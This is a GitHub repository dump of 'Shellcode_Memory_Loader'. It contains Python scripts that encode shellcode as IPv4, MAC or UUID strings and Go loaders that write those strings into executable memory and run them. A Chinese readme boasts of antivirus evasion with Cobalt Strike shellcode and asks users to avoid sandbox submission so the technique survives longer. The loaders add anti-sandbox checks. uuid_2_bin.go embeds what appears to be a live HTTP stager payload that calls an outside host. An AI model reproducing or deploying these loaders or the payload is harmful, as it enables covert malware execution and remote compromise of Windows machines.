├── image1.png ├── image2.png ├── go.mod ├── ipv4_2_bin ├── shellcode_2_ipv4.py └── ipv4_2_bin.go ├── mac_2_bin ├── shellcode_2_mac.py └── mac_2_bin.go ├── uuid_2_bin ├── shellcode_2_uuid.py └── uuid_2_bin.go ├── readme.md └── go.sum /image1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crisprss/Shellcode_Memory_Loader/HEAD/image1.png -------------------------------------------------------------------------------- /image2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crisprss/Shellcode_Memory_Loader/HEAD/image2.png -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module cs_memory_loader 2 | 3 | go 1.16 4 | 5 | require ( 6 | github.com/Binject/universal v0.0.0-20210304094126-daefaa886313 7 | golang.org/x/sys v0.0.0-20211205182925-97ca703d548d // indirect 8 | ) 9 | -------------------------------------------------------------------------------- /ipv4_2_bin/shellcode_2_ipv4.py: -------------------------------------------------------------------------------- 1 | # coding = utf-8 2 | import ctypes 3 | 4 | #Input your shellcode like:\xfc\x48\x83\xe4\xf0\xe8\xxx 5 | shellcode = b'Your shellcode' 6 | ipv4 = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode)/4*15, 0x3000, 0x40) 7 | 8 | for i in range(len(shellcode)/4): 9 | bytes_shellcode = shellcode[i*4:i*4+4] 10 | ctypes.windll.Ntdll.RtlIpv4AddressToStringA(bytes_shellcode, ipv4+i*15) 11 | 12 | a = ctypes.string_at(ipv4, len(shellcode)*4-1) 13 | 14 | l = [] 15 | for i in range(len(shellcode)/4): 16 | d = ctypes.string_at(ipv4+i*15, 15) 17 | l.append(d) 18 | 19 | ipv4_shellcode = str(l).replace("'", "\"").replace(" ", "").replace("\r\n","") 20 | with open("ipv4_shell.txt", "w+") as f: 21 | f.write(ipv4_shellcode) -------------------------------------------------------------------------------- /mac_2_bin/shellcode_2_mac.py: -------------------------------------------------------------------------------- 1 | import ctypes 2 | 3 | #Input your shellcode like:\xfc\x48\x83\xe4\xf0\xe8\xxx 4 | shellcode = b'Your shellcode' 5 | 6 | mac = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode)/6*17, 0x3000, 0x40) 7 | 8 | for i in range(len(shellcode)/6): 9 | bytes_shellcode = shellcode[i*6:6+i*6] 10 | ctypes.windll.Ntdll.RtlEthernetAddressToStringA(bytes_shellcode, mac+i*17) 11 | 12 | a = ctypes.string_at(mac, len(shellcode)*3-1) 13 | #print(a) 14 | 15 | l = [] 16 | for i in range(len(shellcode)/6): 17 | d = ctypes.string_at(mac+i*17, 17) 18 | l.append(d) 19 | 20 | mac_shellcode = str(l).replace("'", "\"").replace(" ", "").replace("\r\n","") 21 | with open("mac_shell.txt", "w+") as f: 22 | f.write(mac_shellcode) 23 | 24 | 25 | -------------------------------------------------------------------------------- /uuid_2_bin/shellcode_2_uuid.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import uuid 3 | 4 | #Input your shellcode like:\xfc\x48\x83\xe4\xf0\xe8\xxx 5 | buf = b"""Your shellcode""" 6 | import uuid 7 | 8 | def convertToUUID(shellcode): 9 | # If shellcode is not in multiples of 16, then add some nullbytes at the end 10 | if len(shellcode) % 16 != 0: 11 | print("[-] Shellcode's length not multiplies of 16 bytes") 12 | print("[-] Adding nullbytes at the end of shellcode, this might break your shellcode.") 13 | print("\n[*] Modified shellcode length: ", len(shellcode) + (16 - (len(shellcode) % 16))) 14 | 15 | addNullbyte = b"\x00" * (16 - (len(shellcode) % 16)) 16 | shellcode += addNullbyte 17 | 18 | uuids = [] 19 | for i in range(0, len(shellcode), 16): 20 | uuidString = str(uuid.UUID(bytes_le=shellcode[i:i + 16])) 21 | uuids.append(uuidString.replace("'", "\"")) 22 | return uuids 23 | 24 | u = convertToUUID(buf) 25 | print(str(u).replace("'", "\"")) 26 | -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | # Shellcode_Memory_Loader 2 | 3 | ## About 4 | 相关资料和原理可以参考: 5 | [https://www.crisprx.top/archives/515](https://) 6 | 7 | ## Note 8 | **注意** 9 | *免杀效果不错,希望师傅们不跑沙箱,让这种方式存活的时间久一点!!!!* 10 | 11 | ## Description 12 | 基于Golang实现的Shellcode内存加载器,共实现3中内存加载shellcode方式,**UUID加载,MAC加载和IPv4加载** 13 | 14 | 结合`binject/universal`实现Golang的内存加载DLL方式,使用`AllocADsMem`实现内存申请,以加强免杀效果 15 | 16 | 简单的反沙箱机制,这里只是一个简单的Demo思路,后续再研究相关反沙箱的思路技术 17 | 18 | ## Usage 19 | ### UUID 20 | 在CS生成C版本的shellcode后填充到`shellcode_2_uuid.py`中: 21 | 22 | ![](https://md.byr.moe/uploads/upload_2b7c111c97ba77d8a854fd9e93c9b49f.png) 23 | 24 | 运行后得到转化后的UUID,全部填充到对应的go文件中: 25 | 26 | ![](https://md.byr.moe/uploads/upload_c548c00ef9e7f27e8139f82adc7306ab.png) 27 | 28 | 编译得到对应的可执行文件即可: 29 | ```golo 30 | go build uuid_2_bin.go 31 | ``` 32 | 33 | **免杀效果** 34 | ![](https://md.byr.moe/uploads/upload_d575aa4b6bbad069384c4697aaef418a.png) 35 | 36 | ![](https://md.byr.moe/uploads/upload_f45720766c7c479e69be6b5f27c86367.png) 37 | 38 | ### MAC 39 | 在CS生成C版本的shellcode后填充到`shellcode_2_mac.py`中运行后会生成`mac_shell.txt` 40 | 41 | ![](https://md.byr.moe/uploads/upload_88e45ae35f6712a706f9e9ddeb3bfaba.png) 42 | 43 | 将其中的MAC地址填充到对应的go文件中: 44 | 45 | ![](https://md.byr.moe/uploads/upload_8c1af479b4685f5187cc13dc049db758.png) 46 | 47 | 48 | 编译得到对应的可执行文件即可: 49 | 50 | ```golo 51 | go build mac_2_bin.go 52 | ``` 53 | 54 | **免杀效果** 55 | ![](https://github.com/crisprss/Shellcode_Memory_Loader/blob/master/image1.png) 56 | 57 | 58 | 59 | ![](https://github.com/crisprss/Shellcode_Memory_Loader/blob/master/image2.png) 60 | 61 | ### IPv4 62 | 使用和MAC内存加载器一致,参考MAC加载器使用方式 63 | 64 | 65 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/Binject/debug v0.0.0-20210225042342-c9b8b45728d2 h1:8kQNJC9AxAaNs0JkXnWUfbNeDnIO1QLYYWjYqC6JEE4= 2 | github.com/Binject/debug v0.0.0-20210225042342-c9b8b45728d2/go.mod h1:QzgxDLY/qdKlvnbnb65eqTedhvQPbaSP2NqIbcuKvsQ= 3 | github.com/Binject/universal v0.0.0-20210304094126-daefaa886313 h1:hX9boCRvCxIpsiV4q9ts+WOYNnjHiji2FOR5BsDzxiY= 4 | github.com/Binject/universal v0.0.0-20210304094126-daefaa886313/go.mod h1:J3XDRlam5pPYca3i6EqgQ35GCCEoyxafpCbLkta0ozc= 5 | github.com/awgh/cppgo v0.0.0-20210224085512-3d24bca8edc0 h1:JjwxKkxzcBk4k8147g0eBQRCIy0UN1Be8AAv6RaIj4Q= 6 | github.com/awgh/cppgo v0.0.0-20210224085512-3d24bca8edc0/go.mod h1:IbERvuyb387Hppp8hX0SQTFt/mkej8+OhuS8L0nC2CI= 7 | github.com/awgh/rawreader v0.0.0-20200626064944-56820a9c6da4 h1:cIAK2NNf2yafdgpFRNJrgZMwvy61BEVpGoHc2n4/yWs= 8 | github.com/awgh/rawreader v0.0.0-20200626064944-56820a9c6da4/go.mod h1:SalMPBCab3yuID8nIhLfzwoBV+lBRyaC7NhuN8qL8xE= 9 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 10 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 11 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= 12 | github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= 13 | golang.org/x/sys v0.0.0-20210217105451-b926d437f341 h1:2/QtM1mL37YmcsT8HaDNHDgTqqFVw+zr8UzMiBVLzYU= 14 | golang.org/x/sys v0.0.0-20210217105451-b926d437f341/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 15 | golang.org/x/sys v0.0.0-20211124211545-fe61309f8881 h1:TyHqChC80pFkXWraUUf6RuB5IqFdQieMLwwCJokV2pc= 16 | golang.org/x/sys v0.0.0-20211124211545-fe61309f8881/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 17 | golang.org/x/sys v0.0.0-20211205182925-97ca703d548d h1:FjkYO/PPp4Wi0EAUOVLxePm7qVW4r4ctbWpURyuOD0E= 18 | golang.org/x/sys v0.0.0-20211205182925-97ca703d548d/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 19 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 20 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 21 | -------------------------------------------------------------------------------- /mac_2_bin/mac_2_bin.go: -------------------------------------------------------------------------------- 1 | /* 2 | Author: Crispr 3 | */ 4 | package main 5 | 6 | import ( 7 | "fmt" 8 | "io/ioutil" 9 | "log" 10 | "os" 11 | "runtime" 12 | "syscall" 13 | "time" 14 | "unsafe" 15 | 16 | "github.com/Binject/universal" 17 | "golang.org/x/sys/windows" 18 | ) 19 | 20 | var ( 21 | kernel32 = windows.NewLazySystemDLL("kernel32") 22 | Activeds = windows.NewLazySystemDLL("Activeds.dll") 23 | HeapCreate = kernel32.NewProc("HeapCreate") 24 | HeapAlloc = kernel32.NewProc("HeapAlloc") 25 | AllocADsMem = Activeds.NewProc("AllocADsMem") 26 | VirtualProtectEx = kernel32.NewProc("VirtualProtectEx") 27 | EnumSystemLocalesW = kernel32.NewProc("EnumSystemLocalesW") 28 | ) 29 | 30 | const ( 31 | //配置堆属性 32 | MEM_COMMIT = 0x1000 33 | MEM_RESERVE = 0x2000 34 | PAGE_EXECUTE_READWRITE = 0x40 // 区域可以执行代码,应用程序可以读写该区域。 35 | HEAP_CREATE_ENABLE_EXECUTE = 0x00040000 36 | ) 37 | 38 | //此处填写shellcode转化为MAC后的字符 例如"FC-48-83-E4-F0-E8", "C8-00-00-00-41-51" 39 | var shell_mac []string = []string{"Your mac shellcode"} 40 | 41 | func numverofCPU() (int, error) { 42 | num_of_cpu := runtime.NumCPU() 43 | if num_of_cpu < 4 { 44 | return 0, nil 45 | } else { 46 | return 1, nil 47 | } 48 | } 49 | 50 | func timeSleep() (int, error) { 51 | startTime := time.Now() 52 | time.Sleep(10 * time.Second) 53 | endTime := time.Now() 54 | sleepTime := endTime.Sub(startTime) 55 | if sleepTime >= time.Duration(10*time.Second) { 56 | return 1, nil 57 | } else { 58 | return 0, nil 59 | } 60 | } 61 | 62 | func physicalMemory() (int, error) { 63 | var mod = syscall.NewLazyDLL("kernel32.dll") 64 | var proc = mod.NewProc("GetPhysicallyInstalledSystemMemory") 65 | var mem uint64 66 | proc.Call(uintptr(unsafe.Pointer(&mem))) 67 | mem = mem / 1048576 68 | if mem < 4 { 69 | return 0, nil 70 | } 71 | return 1, nil 72 | } 73 | 74 | func main() { 75 | //自定义睡眠时间 76 | //timeSleep() 77 | var ntdll_image []byte 78 | var err error 79 | num, _ := numverofCPU() 80 | mem, _ := physicalMemory() 81 | if num == 0 || mem == 0 { 82 | fmt.Printf("Hello Crispr") 83 | os.Exit(1) 84 | } 85 | ntdll_image, err = ioutil.ReadFile("C:\\Windows\\System32\\ntdll.dll") 86 | /* 87 | heapAddr, _, err := HeapCreate.Call(uintptr(HEAP_CREATE_ENABLE_EXECUTE), 0, 0) 88 | if heapAddr == 0 { 89 | log.Fatal(fmt.Sprintf("there was an error calling the HeapCreate function:\r\n%s", err)) 90 | } 91 | */ 92 | ntdll_loader, err := universal.NewLoader() 93 | 94 | if err != nil { 95 | log.Fatal(err) 96 | } 97 | ntdll_library, err := ntdll_loader.LoadLibrary("main", &ntdll_image) 98 | 99 | if err != nil { 100 | log.Fatal(fmt.Sprintf("there was an error calling the LoadLibrary function:\r\n%s", err)) 101 | } 102 | /* 103 | addr, _, err := HeapAlloc.Call(heapAddr, 0, uintptr(len(shell_mac)*6)) 104 | */ 105 | addr, _, err := AllocADsMem.Call(uintptr(len(shell_mac) * 6)) 106 | if addr == 0 || err.Error() != "The operation completed successfully." { 107 | log.Fatal(fmt.Sprintf("there was an error calling the HeapAlloc function:\r\n%s", err)) 108 | } 109 | addrptr := addr 110 | for _, mac := range shell_mac { 111 | u := append([]byte(mac), 0) 112 | _, err = ntdll_library.Call("RtlEthernetStringToAddressA", uintptr(unsafe.Pointer(&u[0])), uintptr(unsafe.Pointer(&u[0])), addrptr) 113 | if err != nil && err.Error() != "The operation completed successfully." { 114 | log.Fatal(fmt.Sprintf("there was an error calling the HeapAlloc function:\r\n%s", err)) 115 | } 116 | addrptr += 6 117 | } 118 | oldProtect := windows.PAGE_READWRITE 119 | VirtualProtectEx.Call(uintptr(windows.CurrentProcess()), addr, uintptr(len(shell_mac)*6), windows.PAGE_EXECUTE_READWRITE, uintptr(unsafe.Pointer(&oldProtect))) 120 | EnumSystemLocalesW.Call(addr, 0) 121 | } 122 | -------------------------------------------------------------------------------- /ipv4_2_bin/ipv4_2_bin.go: -------------------------------------------------------------------------------- 1 | /* 2 | Author: Crispr 3 | */ 4 | package main 5 | 6 | import ( 7 | "fmt" 8 | "io/ioutil" 9 | "log" 10 | "os" 11 | "runtime" 12 | "syscall" 13 | "time" 14 | "unsafe" 15 | 16 | "github.com/Binject/universal" 17 | "golang.org/x/sys/windows" 18 | ) 19 | 20 | var ( 21 | kernel32 = windows.NewLazySystemDLL("kernel32") 22 | Activeds = windows.NewLazySystemDLL("Activeds.dll") 23 | HeapCreate = kernel32.NewProc("HeapCreate") 24 | HeapAlloc = kernel32.NewProc("HeapAlloc") 25 | AllocADsMem = Activeds.NewProc("AllocADsMem") 26 | VirtualProtectEx = kernel32.NewProc("VirtualProtectEx") 27 | EnumSystemLocalesW = kernel32.NewProc("EnumSystemLocalesW") 28 | ) 29 | 30 | const ( 31 | //配置堆属性 32 | MEM_COMMIT = 0x1000 33 | MEM_RESERVE = 0x2000 34 | PAGE_EXECUTE_READWRITE = 0x40 // 区域可以执行代码,应用程序可以读写该区域。 35 | HEAP_CREATE_ENABLE_EXECUTE = 0x00040000 36 | ) 37 | 38 | //此处放转换后的shellcode 例如 252.72.131.228\x00", "240.232.200.0\x00\x00" 39 | var shell_ipv4 []string = []string{"Your shellcode"} 40 | 41 | func timeSleep() (int, error) { 42 | startTime := time.Now() 43 | time.Sleep(10 * time.Second) 44 | endTime := time.Now() 45 | sleepTime := endTime.Sub(startTime) 46 | if sleepTime >= time.Duration(10*time.Second) { 47 | return 1, nil 48 | } else { 49 | return 0, nil 50 | } 51 | } 52 | 53 | func numverofCPU() (int, error) { 54 | num_of_cpu := runtime.NumCPU() 55 | if num_of_cpu < 4 { 56 | return 0, nil 57 | } else { 58 | return 1, nil 59 | } 60 | } 61 | 62 | func physicalMemory() (int, error) { 63 | var mod = syscall.NewLazyDLL("kernel32.dll") 64 | var proc = mod.NewProc("GetPhysicallyInstalledSystemMemory") 65 | var mem uint64 66 | proc.Call(uintptr(unsafe.Pointer(&mem))) 67 | mem = mem / 1048576 68 | if mem < 4 { 69 | return 0, nil 70 | } 71 | return 1, nil 72 | } 73 | 74 | func main() { 75 | //自定义睡眠时间 76 | //timeSleep() 77 | var ntdll_image []byte 78 | var err error 79 | num, _ := numverofCPU() 80 | mem, _ := physicalMemory() 81 | if num == 0 || mem == 0 { 82 | fmt.Printf("Hello Crispr") 83 | os.Exit(1) 84 | } 85 | ntdll_image, err = ioutil.ReadFile("C:\\Windows\\System32\\ntdll.dll") 86 | /* 87 | heapAddr, _, err := HeapCreate.Call(uintptr(HEAP_CREATE_ENABLE_EXECUTE), 0, 0) 88 | if heapAddr == 0 { 89 | log.Fatal(fmt.Sprintf("there was an error calling the HeapCreate function:\r\n%s", err)) 90 | } 91 | */ 92 | ntdll_loader, err := universal.NewLoader() 93 | 94 | if err != nil { 95 | log.Fatal(err) 96 | } 97 | ntdll_library, err := ntdll_loader.LoadLibrary("main", &ntdll_image) 98 | 99 | if err != nil { 100 | log.Fatal(fmt.Sprintf("there was an error calling the LoadLibrary function:\r\n%s", err)) 101 | } 102 | /* 103 | addr, _, err := HeapAlloc.Call(heapAddr, 0, uintptr(len(shell_mac)*6)) 104 | */ 105 | addr, _, err := AllocADsMem.Call(uintptr(len(shell_ipv4) * 4)) 106 | if addr == 0 || err.Error() != "The operation completed successfully." { 107 | log.Fatal(fmt.Sprintf("there was an error calling the HeapAlloc function:\r\n%s", err)) 108 | } 109 | addrptr := addr 110 | for _, ipv4 := range shell_ipv4 { 111 | u := append([]byte(ipv4), 0) 112 | _, err = ntdll_library.Call("RtlIpv4StringToAddressA", uintptr(unsafe.Pointer(&u[0])), uintptr(0), uintptr(unsafe.Pointer(&u[0])), addrptr) 113 | if err != nil && err.Error() != "The operation completed successfully." { 114 | log.Fatal(fmt.Sprintf("there was an error calling the HeapAlloc function:\r\n%s", err)) 115 | } 116 | addrptr += 4 117 | } 118 | oldProtect := windows.PAGE_READWRITE 119 | VirtualProtectEx.Call(uintptr(windows.CurrentProcess()), addr, uintptr(len(shell_ipv4)*4), windows.PAGE_EXECUTE_READWRITE, uintptr(unsafe.Pointer(&oldProtect))) 120 | EnumSystemLocalesW.Call(addr, 0) 121 | } 122 | -------------------------------------------------------------------------------- /uuid_2_bin/uuid_2_bin.go: -------------------------------------------------------------------------------- 1 | /* 2 | Author: Crispr 3 | */ 4 | package main 5 | 6 | import ( 7 | "fmt" 8 | "log" 9 | "os" 10 | "runtime" 11 | "syscall" 12 | "time" 13 | "unsafe" 14 | 15 | "golang.org/x/sys/windows" 16 | ) 17 | 18 | const ( 19 | MEM_COMMIT = 0x1000 20 | HEAP_CREATE_ENABLE_EXECUTE = 0x00040000 21 | PAGE_EXECUTE_READWRITE = 0x40 // 区域可以执行代码,应用程序可以读写该区域。 22 | ) 23 | 24 | var ( 25 | ntdll = windows.NewLazyDLL("ntdll.dll") 26 | kernel32 = windows.NewLazyDLL("kernel32.dll") 27 | ZwAllocateVirtualMemory = ntdll.NewProc("ZwAllocateVirtualMemory") 28 | rpcrt4 = syscall.MustLoadDLL("rpcrt4.dll") 29 | UuidFromStringA = rpcrt4.MustFindProc("UuidFromStringA") 30 | HeapCreate = kernel32.NewProc("HeapCreate") 31 | HeapAlloc = kernel32.NewProc("HeapAlloc") 32 | EnumSystemLocalesW = kernel32.NewProc("EnumSystemLocalesW") 33 | //uuids []string = []string{"e48148fc-fff0-ffff-e8cc-000000415141", "31485250-65d2-8b48-5260-488b5218488b", "56512052-8b48-5072-4d31-c9480fb74a4a", "acc03148-613c-027c-2c20-41c1c90d4101", "52ede2c1-8b48-2052-8b42-3c41514801d0", "18788166-020b-850f-7200-00008b808800", "85480000-74c0-4867-01d0-508b4818448b", "01492040-e3d0-4d56-31c9-48ffc9418b34", "d6014888-3148-acc0-41c1-c90d4101c138", "4cf175e0-4c03-0824-4539-d175d858448b", "01492440-66d0-8b41-0c48-448b401c4901", "048b41d0-4888-d001-4158-41585e595a41", "41594158-485a-ec83-2041-52ffe0584159", "128b485a-4be9-ffff-ff5d-49be7773325f", "00003233-5641-8949-e648-81eca0010000", "48e58949-c031-5050-49c7-c40200386c41", "e4894954-894c-41f1-ba4c-772607ffd54c", "0168ea89-0001-5900-41ba-29806b00ffd5", "5059026a-4d50-c931-4d31-c048ffc04889", "eaba41c2-df0f-ffe0-d548-89c76a104158", "48e2894c-f989-ba41-c2db-3767ffd54831", "f98948d2-ba41-e9b7-38ff-ffd54d31c048", "8948d231-41f9-74ba-ec3b-e1ffd54889f9", "41c78948-75ba-4d6e-61ff-d54881c4b002", "83480000-10ec-8948-e24d-31c96a044158", "41f98948-02ba-c8d9-5fff-d54883c4205e", "406af689-5941-0068-1000-0041584889f2", "41c93148-58ba-53a4-e5ff-d54889c34989", "c9314dc7-8949-48f0-89da-4889f941ba02", "ff5fc8d9-48d5-c301-4829-c64885f675e1", "58e7ff41-006a-4959-c7c2-f0b5a256ffd5"} 34 | uuids []string = []string{"e48348fc-e8f0-00c8-0000-415141505251", "d2314856-4865-528b-6048-8b5218488b52", "728b4820-4850-b70f-4a4a-4d31c94831c0", "7c613cac-2c02-4120-c1c9-0d4101c1e2ed", "48514152-528b-8b20-423c-4801d0668178", "75020b18-8b72-8880-0000-004885c07467", "50d00148-488b-4418-8b40-204901d0e356", "41c9ff48-348b-4888-01d6-4d31c94831c0", "c9c141ac-410d-c101-38e0-75f14c034c24", "d1394508-d875-4458-8b40-244901d06641", "44480c8b-408b-491c-01d0-418b04884801", "415841d0-5e58-5a59-4158-4159415a4883", "524120ec-e0ff-4158-595a-488b12e94fff", "6a5dffff-4900-77be-696e-696e65740041", "e6894956-894c-41f1-ba4c-772607ffd548", "3148c931-4dd2-c031-4d31-c94150415041", "79563aba-ffa7-e9d5-9300-00005a4889c1", "1f48b841-0000-314d-c941-5141516a0341", "57ba4151-9f89-ffc6-d5eb-795b4889c148", "8949d231-4dd8-c931-5268-0032c0845252", "55ebba41-3b2e-d5ff-4889-c64883c3506a", "89485f0a-baf1-001f-0000-6a0068803300", "e0894900-b941-0004-0000-41ba75469e86", "8948d5ff-48f1-da89-49c7-c0ffffffff4d", "5252c931-ba41-062d-187b-ffd585c00f85", "0000019d-ff48-0fcf-848c-010000ebb3e9", "000001e4-82e8-ffff-ff2f-6a7175657279", "332e332d-322e-732e-6c69-6d2e6d696e2e", "3b00736a-cf29-6063-d1c3-767ca2682204", "c74b2ba2-2130-3336-5db8-264e55f69fed", "d7766342-2fd5-657d-0485-cef31c60ddc9", "a40f081e-d754-b7e9-0041-63636570743a", "78657420-2f74-7468-6d6c-2c6170706c69", "69746163-6e6f-782f-6874-6d6c2b786d6c", "7070612c-696c-6163-7469-6f6e2f786d6c", "303d713b-392e-2a2c-2f2a-3b713d302e38", "63410a0d-6563-7470-2d4c-616e67756167", "65203a65-2d6e-5355-2c65-6e3b713d302e", "480a0d35-736f-3a74-2074-69616e79612e", "64696162-2e75-6f63-6d0d-0a5265666572", "203a7265-7468-7074-3a2f-2f636f64652e", "6575716a-7972-632e-6f6d-2f0d0a416363", "2d747065-6e45-6f63-6469-6e673a20677a", "202c7069-6564-6c66-6174-650d0a557365", "67412d72-6e65-3a74-204d-6f7a696c6c61", "302e352f-2820-6957-6e64-6f7773204e54", "332e3620-203b-7254-6964-656e742f372e", "72203b30-3a76-3131-2e30-29206c696b65", "63654720-6f6b-0a0d-00f5-a0c2c27fef9f", "7cf12e44-74dd-cf73-e267-eaa41c6c1821", "6cfbab03-0bfa-f915-0041-bef0b5a256ff", "c93148d5-00ba-4000-0041-b80010000041", "000040b9-4100-58ba-a453-e5ffd5489353", "e7894853-8948-48f1-89da-41b800200000", "41f98949-12ba-8996-e2ff-d54883c42085", "66b674c0-078b-0148-c385-c075d7585858", "0faf0548-0000-c350-e87f-fdffff34372e", "322e3539-3931-392e-3600-1969a08d0000"} 35 | ) 36 | 37 | func strPtr(s string) uintptr { 38 | return uintptr(unsafe.Pointer(&s)) 39 | } 40 | 41 | func numverofCPU() (int, error) { 42 | num_of_cpu := runtime.NumCPU() 43 | if num_of_cpu < 4 { 44 | return 0, nil 45 | } else { 46 | return 1, nil 47 | } 48 | } 49 | 50 | func timeSleep() (int, error) { 51 | startTime := time.Now() 52 | time.Sleep(10 * time.Second) 53 | endTime := time.Now() 54 | sleepTime := endTime.Sub(startTime) 55 | if sleepTime >= time.Duration(10*time.Second) { 56 | return 1, nil 57 | } else { 58 | return 0, nil 59 | } 60 | } 61 | 62 | func physicalMemory() (int, error) { 63 | var mod = syscall.NewLazyDLL("kernel32.dll") 64 | var proc = mod.NewProc("GetPhysicallyInstalledSystemMemory") 65 | var mem uint64 66 | proc.Call(uintptr(unsafe.Pointer(&mem))) 67 | mem = mem / 1048576 68 | if mem < 4 { 69 | return 0, nil 70 | } 71 | return 1, nil 72 | } 73 | 74 | func main() { 75 | num, _ := numverofCPU() 76 | mem, _ := physicalMemory() 77 | if num == 0 || mem == 0 { 78 | fmt.Printf("Hello Crispr") 79 | os.Exit(1) 80 | } 81 | 82 | var err error 83 | 84 | if err != nil { 85 | log.Fatal(err) 86 | } 87 | 88 | if err != nil { 89 | log.Fatal(err) 90 | } 91 | 92 | addr, _, err := HeapCreate.Call(uintptr(HEAP_CREATE_ENABLE_EXECUTE), 0, 0) 93 | if addr == 0 || err.Error() != "The operation completed successfully." { 94 | log.Fatal(fmt.Sprintf("there was an error calling the HeapCreate function:\r\n%s", err)) 95 | } 96 | 97 | ZwAllocateVirtualMemory.Call(addr, 0, 0, 0x100000, MEM_COMMIT, PAGE_EXECUTE_READWRITE) 98 | 99 | addrPtr := addr 100 | for _, uuid := range uuids { 101 | u := append([]byte(uuid), 0) 102 | rpcStatus, _, err := UuidFromStringA.Call(uintptr(unsafe.Pointer(&u[0])), addrPtr) 103 | if rpcStatus != 0 { 104 | log.Fatal(fmt.Sprintf("There was an error calling UuidFromStringA:\r\n%s", err)) 105 | } 106 | addrPtr += 16 107 | } 108 | EnumSystemLocalesW.Call(addr, 0) 109 | //syscall.Syscall(addr, 0, 0, 0, 0) 110 | } 111 | --------------------------------------------------------------------------------